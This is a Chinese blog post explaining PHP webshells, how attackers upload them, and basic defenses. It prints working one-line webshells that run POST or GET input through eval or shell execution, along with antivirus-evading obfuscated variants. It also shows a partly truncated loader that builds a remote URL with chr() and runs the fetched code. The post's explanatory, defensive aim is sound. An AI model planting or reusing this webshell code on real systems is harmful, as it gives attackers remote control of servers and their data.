本文探讨了网站安全防护中常见的黑客攻击手段,重点介绍了一句话木马和大马的工作原理及其防御措施。从SQL注入、图片上传漏洞到框架漏洞,详细解析了黑客如何上传木马,并提供了相应的解决方案。
随着接触过的站越来越多,你总会遇到各种各样的“黑客”,这时候你遇到的基本是最初级的青铜黑客选手。在你的网站根目录放入各种各样的马。最小的马就是所谓一句话木马,这种应该遇到最多,也比较不好找,因为常常会伪装成各种各样的图片。最大的马可以获取你整个服务器的资源并加以篡改。接下来举几个栗子。
1.一句话木马
这种代码最常见。代码如下:
//这里执行的是php代码
@eval($_POST['自己定的参数']); // 用assert也可以,具体区别自行百度
//以下是为了免杀及隐藏而加密代码
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));
eval(str_rot13('riny($_CBFG[pzq]);'));
//这里执行的是系统命令
$cmd = $_GET['自己定的参数'];
echo `$cmd`; //等效于echo system($cmd);
这种木马网上出现了各种各样的变种,过狗过盾的也有好多个。这个百度一搜一把把的,这里就不一一列举了
想要彻底防御住一句话木马,首先就要先搞清楚木马是怎么上传到你服务器的。方法有以下几种:
1.利用sql注入,解决办法:关闭数据库端口,使之只能本地调用(附:经常有利用redis之类提权的,所以用到redis的时候务必加个密码)
2.利用伪装成图片上传,解决办法:严格限制上传类中图片的格式和上传文件名格式
3.框架中的漏洞,例如之前TP5的漏洞,解决办法:相关论坛中搜索
2.大马
这种也很经常出现,网上的免费大马的代码也很多,只要传入此类大马,你网站根目录的东西基本就不保了。
常见的代码一般都是一开始写了一个类似密码的变量,之后的可能就是各种加密代码了
一般文件中出现chr编码的,你就要小心了,这种就是一种常见的大马,代码如下:
$password='admin';//
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
//...code
//看了说什么散播入侵代码是禁止的,吓得我赶紧把中间的代码删掉。
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
//...code
//看了说什么散播入侵代码是禁止的,吓得我赶紧把中间的代码删掉。
$_SESSION['PhpCode']=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
@eval($un($_SESSION['PhpCode']));
基本都是各种变种,但是唯一不变的都是利用eval实现的,所以尽量排查自己代码中是否有用到此方法。
扫一扫
9161
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
